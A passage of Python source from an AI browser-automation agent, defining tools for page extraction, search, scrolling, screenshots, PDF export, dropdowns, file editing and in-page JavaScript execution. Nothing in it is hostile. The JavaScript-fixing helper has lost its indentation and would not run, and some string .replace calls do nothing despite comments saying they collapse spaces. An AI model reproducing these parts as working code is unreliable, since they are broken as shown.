            MAX_MEMORY_LENGTH = 10000
            if len(extracted_content) < MAX_MEMORY_LENGTH:
                memory = extracted_content
                include_extracted_content_only_once = False
            else:
                file_name = await file_system.save_extracted_content(extracted_content)
                memory = f'Query: {query}\nContent in {file_name} and once in <read_state>.'
                include_extracted_content_only_once = True
            logger.info(f'📄 {memory}')
            return ActionResult(
                extracted_content=extracted_content,
                include_extracted_content_only_once=include_extracted_content_only_once,
                long_term_memory=memory,
                metadata={'structured_extraction': True, 'extraction_result': extraction_meta.model_dump(mode='json')},
            )
        except Exception as e:
            logger.debug(f'Error in structured extraction: {e}')
            raise RuntimeError(str(e))
    # --- Free-text extraction path (default) ---
    system_prompt = """
You are an expert at extracting data from the markdown of a webpage.
<input>
You will be given a query and the markdown of a webpage that has been filtered to remove noise and advertising content.
</input>
<instructions>
- You are tasked to extract information from the webpage that is relevant to the query.
- You should ONLY use the information available in the webpage to answer the query. Do not make up information or provide guess from your own knowledge.
- If the information relevant to the query is not available in the page, your response should mention that.
- If the query asks for all items, products, etc., make sure to directly list all of them.
- If the content was truncated and you need more information, note that the user can use start_from_char parameter to continue from where truncation occurred.
- If <already_collected> items are provided, exclude any results whose name/title/URL matches those already collected — do not include duplicates.
</instructions>
<output>
- Your output should present ALL the information relevant to the query in a concise way.
- Do not answer in conversational format - directly output the relevant information or that the information is unavailable.
</output>
""".strip()
    already_collected_section = ''
    if already_collected:
        # Cap prompt size: only the first 100 identifiers are listed
        items_str = '\n'.join(f'- {item}' for item in already_collected[:100])
        already_collected_section = f'\n\n<already_collected>\nSkip items whose name/title/URL matches any of these already-collected identifiers:\n{items_str}\n</already_collected>'
    prompt = (
        f'<query>\n{query}\n</query>\n\n<content_stats>\n{stats_summary}\n</content_stats>\n\n<webpage_content>\n{content}\n</webpage_content>'
        + already_collected_section
    )
    try:
        response = await asyncio.wait_for(
            page_extraction_llm.ainvoke([SystemMessage(content=system_prompt), UserMessage(content=prompt)]),
            timeout=120.0,
        )
        current_url = await browser_session.get_current_page_url()
        extracted_content = (
            f'<url>\n{current_url}\n</url>\n<query>\n{query}\n</query>\n<result>\n{response.completion}\n</result>'
        )
        # Simple memory handling: large results go to a file, not memory
        MAX_MEMORY_LENGTH = 10000
        if len(extracted_content) < MAX_MEMORY_LENGTH:
            memory = extracted_content
            include_extracted_content_only_once = False
        else:
            file_name = await file_system.save_extracted_content(extracted_content)
            memory = f'Query: {query}\nContent in {file_name} and once in <read_state>.'
            include_extracted_content_only_once = True
        logger.info(f'📄 {memory}')
        return ActionResult(
            extracted_content=extracted_content,
            include_extracted_content_only_once=include_extracted_content_only_once,
            long_term_memory=memory,
        )
    except Exception as e:
        logger.debug(f'Error extracting content: {e}')
        raise RuntimeError(str(e))
# --- Page search and exploration tools (zero LLM cost) ---
@self.registry.action(
    """Search page text for a pattern (like grep). Zero LLM cost, instant. Returns matches with surrounding context. Use to find specific text, verify content exists, or locate data on the page. Set regex=True for regex patterns. Use css_scope to search within a specific section.""",
    param_model=SearchPageAction,
)
async def search_page(params: SearchPageAction, browser_session: BrowserSession):
    """Grep-like text search executed in the page via CDP Runtime.evaluate.

    Edge cases (three distinct failure shapes from the JS evaluation):
    - exceptionDetails present → the injected script itself threw;
    - a None value → the script returned nothing;
    - a dict with an 'error' key → the script ran but reported a
      search-level error (e.g. bad regex or css_scope).
    Zero matches is NOT an error — it returns a normal result with total 0.
    """
    js_code = _build_search_page_js(
        pattern=params.pattern,
        regex=params.regex,
        case_sensitive=params.case_sensitive,
        context_chars=params.context_chars,
        css_scope=params.css_scope,
        max_results=params.max_results,
    )
    cdp_session = await browser_session.get_or_create_cdp_session()
    result = await cdp_session.cdp_client.send.Runtime.evaluate(
        params={'expression': js_code, 'returnByValue': True, 'awaitPromise': True},
        session_id=cdp_session.session_id,
    )
    if result.get('exceptionDetails'):
        error_text = result['exceptionDetails'].get('text', 'Unknown JS error')
        return ActionResult(error=f'search_page failed: {error_text}')
    data = result.get('result', {}).get('value')
    if data is None:
        return ActionResult(error='search_page returned no result')
    if isinstance(data, dict) and data.get('error'):
        return ActionResult(error=f'search_page: {data["error"]}')
    formatted = _format_search_results(data, params.pattern)
    total = data.get('total', 0)
    memory = f'Searched page for "{params.pattern}": {total} match{"es" if total != 1 else ""} found.'
    logger.info(f'🔎 {memory}')
    return ActionResult(extracted_content=formatted, long_term_memory=memory)
@self.registry.action(
    """Query DOM elements by CSS selector (like find). Zero LLM cost, instant. Returns matching elements with tag, text, and attributes. Use to explore page structure, count items, get links/attributes. Use attributes=["href","src"] to extract specific attributes.""",
    param_model=FindElementsAction,
)
async def find_elements(params: FindElementsAction, browser_session: BrowserSession):
    """Run a CSS-selector query in the page via CDP and report the matches.

    Distinguishes three failure shapes from the evaluation: a JS exception,
    a missing return value, and a script-reported error payload. Zero
    matches is not an error.
    """
    expression = _build_find_elements_js(
        selector=params.selector,
        attributes=params.attributes,
        max_results=params.max_results,
        include_text=params.include_text,
    )
    cdp_session = await browser_session.get_or_create_cdp_session()
    eval_result = await cdp_session.cdp_client.send.Runtime.evaluate(
        params={'expression': expression, 'returnByValue': True, 'awaitPromise': True},
        session_id=cdp_session.session_id,
    )
    # JS-level exception from the injected script
    exception_details = eval_result.get('exceptionDetails')
    if exception_details:
        return ActionResult(error=f'find_elements failed: {exception_details.get("text", "Unknown JS error")}')
    payload = eval_result.get('result', {}).get('value')
    # Script completed but produced no value
    if payload is None:
        return ActionResult(error='find_elements returned no result')
    # Script ran and reported its own error
    if isinstance(payload, dict) and payload.get('error'):
        return ActionResult(error=f'find_elements: {payload["error"]}')
    formatted = _format_find_results(payload, params.selector)
    match_count = payload.get('total', 0)
    memory = f'Found {match_count} element{"s" if match_count != 1 else ""} matching "{params.selector}".'
    logger.info(f'🔍 {memory}')
    return ActionResult(extracted_content=formatted, long_term_memory=memory)
@self.registry.action(
	"""Scroll by pages. REQUIRED: down=True/False (True=scroll down, False=scroll up, default=True). Optional: pages=0.5-10.0 (default 1.0). Use index for scroll elements (dropdowns/custom UI). High pages (10) reaches bottom. Multi-page scrolls sequentially. Viewport-based height, fallback 1000px/page.""",
	param_model=ScrollAction,
)
async def scroll(params: ScrollAction, browser_session: BrowserSession):
	"""Scroll the page (or a scrollable element) by ``params.pages`` viewport heights.

	Edge cases handled:
	- ``index`` of ``None`` or ``0`` scrolls the whole page (no node lookup at all);
	  a stale non-zero index returns an error ActionResult instead of raising.
	- Viewport-height detection failures fall back to 1000px per page.
	- ``pages >= 1.0`` scrolls sequentially one page at a time (plus an optional
	  fractional remainder); a single failed page-scroll is logged and skipped so
	  the remaining scrolls still run — ``completed_scrolls`` tracks actual progress.
	- ``pages < 1.0`` performs exactly one scroll of the corresponding pixel fraction.
	- ``pages == 1.0`` reports the scrolled distance in px rather than page count.
	"""
	try:
		# Look up the node from the selector map if index is provided
		# Special case: index 0 means scroll the whole page (root/body element)
		node = None
		if params.index is not None and params.index != 0:
			node = await browser_session.get_element_by_index(params.index)
			if node is None:
				# Element does not exist
				msg = f'Element index {params.index} not found in browser state'
				return ActionResult(error=msg)
		direction = 'down' if params.down else 'up'
		# target is '' for whole-page scrolls; the stray double space that leaves in the
		# memory strings below is collapsed by the .replace() calls.
		target = f'element {params.index}' if params.index is not None and params.index != 0 else ''
		# Get actual viewport height for more accurate scrolling
		try:
			cdp_session = await browser_session.get_or_create_cdp_session()
			metrics = await cdp_session.cdp_client.send.Page.getLayoutMetrics(session_id=cdp_session.session_id)
			# Use cssVisualViewport for the most accurate representation
			css_viewport = metrics.get('cssVisualViewport', {})
			css_layout_viewport = metrics.get('cssLayoutViewport', {})
			# Get viewport height, prioritizing cssVisualViewport
			viewport_height = int(css_viewport.get('clientHeight') or css_layout_viewport.get('clientHeight', 1000))
			logger.debug(f'Detected viewport height: {viewport_height}px')
		except Exception as e:
			viewport_height = 1000  # Fallback to 1000px
			logger.debug(f'Failed to get viewport height, using fallback 1000px: {e}')
		# For multiple pages (>=1.0), scroll one page at a time to ensure each scroll completes
		if params.pages >= 1.0:
			import asyncio
			num_full_pages = int(params.pages)
			remaining_fraction = params.pages - num_full_pages
			completed_scrolls = 0
			# Scroll one page at a time
			for i in range(num_full_pages):
				try:
					pixels = viewport_height  # Use actual viewport height
					if not params.down:
						pixels = -pixels
					event = browser_session.event_bus.dispatch(
						ScrollEvent(direction=direction, amount=abs(pixels), node=node)
					)
					await event
					await event.event_result(raise_if_any=True, raise_if_none=False)
					completed_scrolls += 1
					# Small delay to ensure scroll completes before next one
					await asyncio.sleep(0.15)
				except Exception as e:
					logger.warning(f'Scroll {i + 1}/{num_full_pages} failed: {e}')
					# Continue with remaining scrolls even if one fails
			# Handle fractional page if present
			if remaining_fraction > 0:
				try:
					pixels = int(remaining_fraction * viewport_height)
					if not params.down:
						pixels = -pixels
					event = browser_session.event_bus.dispatch(
						ScrollEvent(direction=direction, amount=abs(pixels), node=node)
					)
					await event
					await event.event_result(raise_if_any=True, raise_if_none=False)
					completed_scrolls += remaining_fraction
				except Exception as e:
					logger.warning(f'Fractional scroll failed: {e}')
			if params.pages == 1.0:
				long_term_memory = f'Scrolled {direction} {target} {viewport_height}px'.replace(' ', ' ')
			else:
				long_term_memory = f'Scrolled {direction} {target} {completed_scrolls:.1f} pages'.replace(' ', ' ')
		else:
			# For fractional pages <1.0, do single scroll
			pixels = int(params.pages * viewport_height)
			event = browser_session.event_bus.dispatch(
				ScrollEvent(direction='down' if params.down else 'up', amount=pixels, node=node)
			)
			await event
			await event.event_result(raise_if_any=True, raise_if_none=False)
			long_term_memory = f'Scrolled {direction} {target} {params.pages} pages'.replace(' ', ' ')
		msg = f'🔍 {long_term_memory}'
		logger.info(msg)
		return ActionResult(extracted_content=msg, long_term_memory=long_term_memory)
	except Exception as e:
		logger.error(f'Failed to dispatch ScrollEvent: {type(e).__name__}: {e}')
		error_msg = 'Failed to execute scroll action.'
		return ActionResult(error=error_msg)
@self.registry.action(
	'',
	param_model=SendKeysAction,
)
async def send_keys(params: SendKeysAction, browser_session: BrowserSession):
	"""Forward raw keyboard input to the page via a SendKeysEvent.

	Any failure — dispatching, awaiting, or the handler raising — is converted
	into an error ActionResult rather than propagating.
	"""
	try:
		keys_event = browser_session.event_bus.dispatch(SendKeysEvent(keys=params.keys))
		await keys_event
		await keys_event.event_result(raise_if_any=True, raise_if_none=False)
		memory = f'Sent keys: {params.keys}'
		logger.info(f'⌨️ {memory}')
		return ActionResult(extracted_content=memory, long_term_memory=memory)
	except Exception as exc:
		logger.error(f'Failed to dispatch SendKeysEvent: {type(exc).__name__}: {exc}')
		return ActionResult(error=f'Failed to send keys: {str(exc)}')
@self.registry.action('Scroll to text.')
async def find_text(text: str, browser_session: BrowserSession):  # type: ignore
	"""Scroll the page until ``text`` is visible.

	Edge cases:
	- The dispatch itself happens *outside* the try block, so a failure to dispatch
	  the event propagates to the caller.
	- Any exception from the handler — not only a genuine "text missing" case — is
	  reported to the agent as "not found", as a non-error ActionResult.
	"""
	# Dispatch scroll to text event
	event = browser_session.event_bus.dispatch(ScrollToTextEvent(text=text))
	try:
		# The handler returns None on success or raises an exception if text not found
		await event.event_result(raise_if_any=True, raise_if_none=False)
		memory = f'Scrolled to text: {text}'
		msg = f'🔍 {memory}'
		logger.info(msg)
		return ActionResult(extracted_content=memory, long_term_memory=memory)
	except Exception as e:
		# Text not found
		msg = f"Text '{text}' not found or not visible on page"
		logger.info(msg)
		return ActionResult(
			extracted_content=msg,
			long_term_memory=f"Tried scrolling to text '{text}' but it was not found",
		)
@self.registry.action(
	'Take a screenshot of the current viewport. If file_name is provided, saves to that file and returns the path. '
	'Otherwise, screenshot is included in the next browser_state observation.',
	param_model=ScreenshotAction,
)
async def screenshot(
	params: ScreenshotAction,
	browser_session: BrowserSession,
	file_system: FileSystem,
):
	"""Capture the current viewport.

	Edge cases:
	- A missing ``.png`` extension is appended automatically, and the name is run
	  through ``FileSystem.sanitize_filename``.
	- An existing file with the same name is not overwritten; a ``name (1).png``
	  style suffix is chosen instead (consistent with ``save_as_pdf``).
	- Without ``file_name``, nothing is written to disk: a metadata flag requests
	  that the screenshot be attached to the next browser_state observation.
	"""
	if params.file_name:
		# Save screenshot to file
		file_name = params.file_name
		if not file_name.lower().endswith('.png'):
			file_name = f'{file_name}.png'
		file_name = FileSystem.sanitize_filename(file_name)
		screenshot_bytes = await browser_session.take_screenshot(full_page=False)
		file_path = file_system.get_dir() / file_name
		# Handle duplicate filenames — never silently clobber an earlier screenshot
		if file_path.exists():
			base, ext = os.path.splitext(file_name)
			counter = 1
			while (file_system.get_dir() / f'{base} ({counter}){ext}').exists():
				counter += 1
			file_name = f'{base} ({counter}){ext}'
			file_path = file_system.get_dir() / file_name
		file_path.write_bytes(screenshot_bytes)
		result = f'Screenshot saved to {file_name}'
		logger.info(f'📸 {result}. Full path: {file_path}')
		return ActionResult(
			extracted_content=result,
			long_term_memory=f'{result}. Full path: {file_path}',
			attachments=[str(file_path)],
		)
	else:
		# Flag for next observation
		memory = 'Requested screenshot for next observation'
		logger.info(f'📸 {memory}')
		return ActionResult(
			extracted_content=memory,
			metadata={'include_screenshot': True},
		)
# PDF Actions
@self.registry.action(
	'Save the current page as a PDF file. Returns the file path of the saved PDF. '
	'Use this to capture the full page content (including content below the fold) as a printable document.',
	param_model=SaveAsPdfAction,
)
async def save_as_pdf(
	params: SaveAsPdfAction,
	browser_session: BrowserSession,
	file_system: FileSystem,
):
	"""Render the current page to a PDF via CDP ``Page.printToPDF``.

	Edge cases:
	- An unrecognized ``paper_format`` silently falls back to 'letter'.
	- Without ``file_name``, the page title (non-word chars stripped, first 50 chars)
	  is used; an empty or unavailable title (2s timeout) falls back to 'page'.
	- A missing ``.pdf`` extension is appended and the name is sanitized.
	- Existing files are never overwritten: a ' (n)' counter suffix is appended.
	- ``printToPDF`` is bounded by a 30s timeout; empty CDP data fails the assert.
	"""
	import base64
	import re
	# Paper format dimensions in inches (width, height)
	paper_sizes: dict[str, tuple[float, float]] = {
		'letter': (8.5, 11),
		'legal': (8.5, 14),
		'a4': (8.27, 11.69),
		'a3': (11.69, 16.54),
		'tabloid': (11, 17),
	}
	paper_key = params.paper_format.lower()
	if paper_key not in paper_sizes:
		paper_key = 'letter'
	paper_width, paper_height = paper_sizes[paper_key]
	cdp_session = await browser_session.get_or_create_cdp_session(focus=True)
	result = await asyncio.wait_for(
		cdp_session.cdp_client.send.Page.printToPDF(
			params={
				'printBackground': params.print_background,
				'landscape': params.landscape,
				'scale': params.scale,
				'paperWidth': paper_width,
				'paperHeight': paper_height,
				'preferCSSPageSize': True,
			},
			session_id=cdp_session.session_id,
		),
		timeout=30.0,
	)
	pdf_data = result.get('data')
	assert pdf_data, 'CDP Page.printToPDF returned no data'
	pdf_bytes = base64.b64decode(pdf_data)
	# Determine filename
	if params.file_name:
		file_name = params.file_name
	else:
		try:
			page_title = await asyncio.wait_for(browser_session.get_current_page_title(), timeout=2.0)
			safe_title = re.sub(r'[^\w\s-]', '', page_title).strip()[:50]
			file_name = safe_title if safe_title else 'page'
		except Exception:
			file_name = 'page'
	if not file_name.lower().endswith('.pdf'):
		file_name = f'{file_name}.pdf'
	file_name = FileSystem.sanitize_filename(file_name)
	file_path = file_system.get_dir() / file_name
	# Handle duplicate filenames
	if file_path.exists():
		base, ext = os.path.splitext(file_name)
		counter = 1
		while (file_system.get_dir() / f'{base} ({counter}){ext}').exists():
			counter += 1
		file_name = f'{base} ({counter}){ext}'
		file_path = file_system.get_dir() / file_name
	async with await anyio.open_file(file_path, 'wb') as f:
		await f.write(pdf_bytes)
	file_size = file_path.stat().st_size
	msg = f'Saved page as PDF: {file_name} ({file_size:,} bytes)'
	logger.info(f'📄 {msg}. Full path: {file_path}')
	return ActionResult(
		extracted_content=msg,
		long_term_memory=f'{msg}. Full path: {file_path}',
		attachments=[str(file_path)],
	)
# Dropdown Actions
@self.registry.action(
	'',
	param_model=GetDropdownOptionsAction,
)
async def dropdown_options(params: GetDropdownOptionsAction, browser_session: BrowserSession):
	"""Fetch the available options of a dropdown element by its index.

	Edge cases:
	- A stale index (element no longer in the selector map) returns a plain
	  informational ActionResult, not an error, so the agent can refresh state.
	- ``event_result`` is called with ``raise_if_none=True`` and a 3s timeout, so
	  the following falsy check is a defensive guard (e.g. for an empty dict).
	"""
	# Look up the node from the selector map
	node = await browser_session.get_element_by_index(params.index)
	if node is None:
		msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
		logger.warning(f'⚠️ {msg}')
		return ActionResult(extracted_content=msg)
	# Dispatch GetDropdownOptionsEvent to the event handler
	event = browser_session.event_bus.dispatch(GetDropdownOptionsEvent(node=node))
	dropdown_data = await event.event_result(timeout=3.0, raise_if_none=True, raise_if_any=True)
	if not dropdown_data:
		raise ValueError('Failed to get dropdown options - no data returned')
	# Use structured memory from the handler
	return ActionResult(
		extracted_content=dropdown_data['short_term_memory'],
		long_term_memory=dropdown_data['long_term_memory'],
		include_extracted_content_only_once=True,
	)
@self.registry.action(
	'Set the option of a <select> element.',
	param_model=SelectDropdownOptionAction,
)
async def select_dropdown(params: SelectDropdownOptionAction, browser_session: BrowserSession):
	"""Select a dropdown option (by visible text) on the element at ``params.index``.

	Edge cases:
	- A stale index returns an informational (non-error) ActionResult.
	- The handler signals success with the *string* ``'true'`` — not a boolean.
	- On failure, a structured short/long-term-memory payload is preferred when the
	  handler provides it; otherwise a plain error ActionResult is returned.
	"""
	# Look up the node from the selector map
	node = await browser_session.get_element_by_index(params.index)
	if node is None:
		msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
		logger.warning(f'⚠️ {msg}')
		return ActionResult(extracted_content=msg)
	# Dispatch SelectDropdownOptionEvent to the event handler
	from browser_use.browser.events import SelectDropdownOptionEvent
	event = browser_session.event_bus.dispatch(SelectDropdownOptionEvent(node=node, text=params.text))
	selection_data = await event.event_result()
	if not selection_data:
		raise ValueError('Failed to select dropdown option - no data returned')
	# Check if the selection was successful
	if selection_data.get('success') == 'true':
		# Extract the message from the returned data
		msg = selection_data.get('message', f'Selected option: {params.text}')
		return ActionResult(
			extracted_content=msg,
			include_in_memory=True,
			long_term_memory=f"Selected dropdown option '{params.text}' at index {params.index}",
		)
	else:
		# Handle structured error response
		# TODO: raise BrowserError instead of returning ActionResult
		if 'short_term_memory' in selection_data and 'long_term_memory' in selection_data:
			return ActionResult(
				extracted_content=selection_data['short_term_memory'],
				long_term_memory=selection_data['long_term_memory'],
				include_extracted_content_only_once=True,
			)
		else:
			# Fallback to regular error
			error_msg = selection_data.get('error', f'Failed to select option: {params.text}')
			return ActionResult(error=error_msg)
# File System Actions
@self.registry.action(
	'Write content to a file. By default this OVERWRITES the entire file - use append=true to add to an existing file, or use replace_file for targeted edits within a file. '
	'FILENAME RULES: Use only letters, numbers, underscores, hyphens, dots, parentheses. Spaces are auto-converted to hyphens. '
	'SUPPORTED EXTENSIONS: .txt, .md, .json, .jsonl, .csv, .html, .xml, .pdf, .docx. '
	'CANNOT write binary/image files (.png, .jpg, .mp4, etc.) - do not attempt to save screenshots as files. '
	'For PDF files, write content in markdown format and it will be auto-converted to PDF.'
)
async def write_file(
	file_name: str,
	content: str,
	file_system: FileSystem,
	append: bool = False,
	trailing_newline: bool = True,
	leading_newline: bool = False,
):
	"""Write (or append) ``content`` to a FileSystem-managed file.

	Edge cases:
	- ``trailing_newline`` defaults to True, so a newline is appended to every
	  write unless explicitly disabled; ``leading_newline`` can pad the front too
	  (both may apply to the same write).
	- ``append=True`` delegates to ``append_file`` instead of overwriting.
	- The on-disk name may differ from ``file_name`` (sanitization); the private
	  ``_resolve_filename`` is used only to log the real path.
	"""
	if trailing_newline:
		content += '\n'
	if leading_newline:
		content = '\n' + content
	if append:
		result = await file_system.append_file(file_name, content)
	else:
		result = await file_system.write_file(file_name, content)
	# Log the full path where the file is stored (use resolved name)
	resolved_name, _ = file_system._resolve_filename(file_name)
	file_path = file_system.get_dir() / resolved_name
	logger.info(f'💾 {result} File location: {file_path}')
	return ActionResult(extracted_content=result, long_term_memory=result)
@self.registry.action(
	'Replace specific text within a file by searching for old_str and replacing with new_str. Use this for targeted edits like updating todo checkboxes or modifying specific lines without rewriting the entire file.'
)
async def replace_file(file_name: str, old_str: str, new_str: str, file_system: FileSystem):
	"""Replace occurrences of ``old_str`` with ``new_str`` inside a managed file.

	The outcome message (including how a missing ``old_str`` is handled) comes
	entirely from ``file_system.replace_file_str`` — presumably it reports a
	no-match case rather than raising; TODO confirm against the FileSystem service.
	"""
	result = await file_system.replace_file_str(file_name, old_str, new_str)
	logger.info(f'💾 {result}')
	return ActionResult(extracted_content=result, long_term_memory=result)
@self.registry.action(
	'Read the complete content of a file. Use this to view file contents before editing or to retrieve data from files. Supports text files (txt, md, json, csv, jsonl), documents (pdf, docx), and images (jpg, png).'
)
async def read_file(file_name: str, available_file_paths: list[str], file_system: FileSystem):
	"""Read a file's full content, with a size-capped long-term-memory summary.

	Edge cases:
	- A file listed in ``available_file_paths`` is read as an *external* file;
	  anything else is resolved through the FileSystem service.
	- Image reads keep only a short "Read image file ..." note in memory.
	- Text longer than 1000 chars is truncated line-by-line: whole lines are kept
	  while the budget allows, then "N more lines..." is appended. If even the
	  first line exceeds the budget, the memory is just the more-lines note.
	"""
	if available_file_paths and file_name in available_file_paths:
		structured_result = await file_system.read_file_structured(file_name, external_file=True)
	else:
		structured_result = await file_system.read_file_structured(file_name)
	result = structured_result['message']
	images = structured_result.get('images')
	MAX_MEMORY_SIZE = 1000
	# For images, create a shorter memory message
	if images:
		memory = f'Read image file {file_name}'
	elif len(result) > MAX_MEMORY_SIZE:
		lines = result.splitlines()
		display = ''
		lines_count = 0
		for line in lines:
			if len(display) + len(line) < MAX_MEMORY_SIZE:
				display += line + '\n'
				lines_count += 1
			else:
				break
		remaining_lines = len(lines) - lines_count
		memory = f'{display}{remaining_lines} more lines...' if remaining_lines > 0 else display
	else:
		memory = result
	logger.info(f'💾 {memory}')
	return ActionResult(
		extracted_content=result,
		long_term_memory=memory,
		images=images,
		include_extracted_content_only_once=True,
	)
@self.registry.action(
	"""Execute browser JavaScript. Best practice: wrap in IIFE (function(){...})() with try-catch for safety. Use ONLY browser APIs (document, window, DOM). NO Node.js APIs (fs, require, process). Example: (function(){try{const el=document.querySelector('#id');return el?el.value:'not found'}catch(e){return 'Error: '+e.message}})() Avoid comments. Use for hover, drag, zoom, custom selectors, extract/filter links, or analysing page structure. IMPORTANT: Shadow DOM elements with [index] markers can be clicked directly with click(index) — do NOT use evaluate() to click them. Only use evaluate for shadow DOM elements that are NOT indexed. Limit output size.""",
	terminates_sequence=True,
)
async def evaluate(code: str, browser_session: BrowserSession):
	"""Run arbitrary JavaScript in the page and return its serialized result.

	Edge cases:
	- ``code`` is first run through ``_validate_and_fix_javascript`` to repair
	  common quote-escaping mistakes before execution.
	- ``awaitPromise=True`` is always set (CDP ignores it for non-promise results).
	- JS errors surface via ``exceptionDetails``; ``wasThrown`` is a backup check.
	- A ``None`` value distinguishes JS ``null`` (key present) from ``undefined``
	  (key absent) by checking for the 'value' key.
	- Embedded base64 data-URL images are moved to metadata and replaced with an
	  '[Image]' placeholder *before* length limits apply.
	- Results over 20000 chars are truncated; results of 10000+ chars are only
	  summarized in long-term memory.
	"""
	# Execute JavaScript with proper error handling and promise support
	cdp_session = await browser_session.get_or_create_cdp_session()
	try:
		# Validate and potentially fix JavaScript code before execution
		validated_code = self._validate_and_fix_javascript(code)
		# Always use awaitPromise=True - it's ignored for non-promises
		result = await cdp_session.cdp_client.send.Runtime.evaluate(
			params={'expression': validated_code, 'returnByValue': True, 'awaitPromise': True},
			session_id=cdp_session.session_id,
		)
		# Check for JavaScript execution errors
		if result.get('exceptionDetails'):
			exception = result['exceptionDetails']
			error_msg = f'JavaScript execution error: {exception.get("text", "Unknown error")}'
			# Enhanced error message with debugging info
			enhanced_msg = f"""JavaScript Execution Failed:
{error_msg}
Validated Code (after quote fixing):
{validated_code[:500]}{'...' if len(validated_code) > 500 else ''}
"""
			logger.debug(enhanced_msg)
			return ActionResult(error=enhanced_msg)
		# Get the result data
		result_data = result.get('result', {})
		# Check for wasThrown flag (backup error detection)
		if result_data.get('wasThrown'):
			msg = f'JavaScript code: {code} execution failed (wasThrown=true)'
			logger.debug(msg)
			return ActionResult(error=msg)
		# Get the actual value
		value = result_data.get('value')
		# Handle different value types
		if value is None:
			# Could be legitimate null/undefined result
			result_text = str(value) if 'value' in result_data else 'undefined'
		elif isinstance(value, (dict, list)):
			# Complex objects - should be serialized by returnByValue
			try:
				result_text = json.dumps(value, ensure_ascii=False)
			except (TypeError, ValueError):
				# Fallback for non-serializable objects
				result_text = str(value)
		else:
			# Primitive values (string, number, boolean)
			result_text = str(value)
		import re
		image_pattern = r'(data:image/[^;]+;base64,[A-Za-z0-9+/=]+)'
		found_images = re.findall(image_pattern, result_text)
		metadata = None
		if found_images:
			# Store images in metadata so they can be added as ContentPartImageParam
			metadata = {'images': found_images}
			# Replace image data in result text with shorter placeholder
			modified_text = result_text
			for i, img_data in enumerate(found_images, 1):
				placeholder = '[Image]'
				modified_text = modified_text.replace(img_data, placeholder)
			result_text = modified_text
		# Apply length limit with better truncation (after image extraction)
		if len(result_text) > 20000:
			result_text = result_text[:19950] + '\n... [Truncated after 20000 characters]'
		# Don't log the code - it's already visible in the user's cell
		logger.debug(f'JavaScript executed successfully, result length: {len(result_text)}')
		# Memory handling: keep full result in extracted_content for current step,
		# but use truncated version in long_term_memory if too large
		MAX_MEMORY_LENGTH = 10000
		if len(result_text) < MAX_MEMORY_LENGTH:
			memory = result_text
			include_extracted_content_only_once = False
		else:
			memory = f'JavaScript executed successfully, result length: {len(result_text)} characters.'
			include_extracted_content_only_once = True
		# Return only the result, not the code (code is already in user's cell)
		return ActionResult(
			extracted_content=result_text,
			long_term_memory=memory,
			include_extracted_content_only_once=include_extracted_content_only_once,
			metadata=metadata,
		)
	except Exception as e:
		# CDP communication or other system errors
		error_msg = f'Failed to execute JavaScript: {type(e).__name__}: {e}'
		logger.debug(f'JavaScript code that failed: {code[:200]}...')
		return ActionResult(error=error_msg)
def _validate_and_fix_javascript(self, code: str) -> str:
import re
# Pattern 1: Fix double-escaped quotes (\\\" → \")
fixed_code = re.sub(r'\\"', '"', code)
# Pattern 2: Fix over-escaped regex patterns (\\\\d → \\d)
# Common issue: regex gets double-escaped during parsing
fixed_code = re.sub(r'\\\\([dDsSwWbBnrtfv])', r'\\\1', fixed_code)
fixed_code = re.sub(r'\\\\([.*+?^${}()|[\]])', r'\\\1', fixed_code)
# Pattern 3: Fix XPath expressions with mixed quotes
xpath_pattern = r'document\.evaluate\s*\(\s*"([^"]*)"\s*,'
def fix_xpath_quotes(match):
xpath_with_quotes = match.group(1)
return f'document.evaluate(`{xpath_with_quotes}`,'
fixed_code = re.sub(xpath_pattern, fix_xpath_quotes, fixed_code)
# Pattern 4: Fix querySelector/querySelectorAll with mixed quotes
selector_pattern = r'(querySelector(?:All)?)\s*\(\s*"([^"]*)"\s*\)'
def fix_selector_quotes(match):
method_name = match.group(1)
selector_with_quotes = match.group(2)
return f'{method_name}(`{selector_with_quotes}`)'
fixed_code = re.sub(selector_pattern, fix_selector_quotes, fixed_code)
# Pattern 5: Fix closest() calls with mixed quotes
closest_pattern = r'\.closest\s*\(\s*"([^"]*)"\s*\)'
def fix_closest_quotes(match):
selector_with_quotes = match.group(1)
return f'.closest(`{selector_with_quotes}`)'
fixed_code = re.sub(closest_pattern, fix_closest_quotes, fixed_code)
# Pattern 6: Fix .matches() calls with mixed quotes (similar to closest)
matches_pattern = r'\.matches\s*\(\s*"([^"]*)"\s*\)'
def fix_matches_quotes(match):
selector_with_quotes = match.group(1)
return f'.matches(`{selector_with_quotes}`)'
fixed_code = re.sub(matches_pattern, fix_matches_quotes, fixed_code)
# Note: Removed getAttribute fix - attribute names rarely have mixed quotes
# getAttribute typically uses simple names like "data-value", not complex selectors
# Log changes made
changes_made = []
if r'\"' in code and r'\"' not in fixed_code:
changes_made.append('fixed escaped quotes')
if '`' in fixed_code and '`' not in code:
changes_made.append('converted mixed quotes to template literals')
if changes_made:
logger.debug(f'JavaScript fixes applied: {", ".join(changes_made)}')
return fixed_code
def _register_done_action(self, output_model: type[T] | None, display_files_in_done_text: bool = True):
	"""Register the terminal `done` action.

	Two mutually exclusive variants are registered depending on ``output_model``:
	a structured-output variant (JSON-serialized pydantic data) or a free-text
	variant. Edge cases are noted on each nested handler.
	"""
	if output_model is not None:
		self.display_files_in_done_text = display_files_in_done_text
		@self.registry.action(
			'Complete task with structured output.',
			param_model=StructuredOutputAction[output_model],
		)
		async def done(params: StructuredOutputAction, file_system: FileSystem, browser_session: BrowserSession):
			"""Structured done. Edge cases: files in files_to_display that the
			FileSystem cannot display are silently skipped; CDP-tracked session
			downloads are auto-attached but deduplicated against explicit requests."""
			# Exclude success from the output JSON
			# Use mode='json' to properly serialize enums at all nesting levels
			output_dict = params.data.model_dump(mode='json')
			attachments: list[str] = []
			# 1. Resolve any explicitly requested files via files_to_display
			if params.files_to_display:
				for file_name in params.files_to_display:
					file_content = file_system.display_file(file_name)
					if file_content:
						attachments.append(str(file_system.get_dir() / file_name))
			# 2. Auto-attach actual session downloads (CDP-tracked browser downloads)
			# but NOT user-supplied whitelist paths from available_file_paths
			session_downloads = browser_session.downloaded_files
			if session_downloads:
				existing = set(attachments)
				for file_path in session_downloads:
					if file_path not in existing:
						attachments.append(file_path)
			return ActionResult(
				is_done=True,
				success=params.success,
				extracted_content=json.dumps(output_dict, ensure_ascii=False),
				long_term_memory=f'Task completed. Success Status: {params.success}',
				attachments=attachments,
			)
	else:
		@self.registry.action(
			'Complete task.',
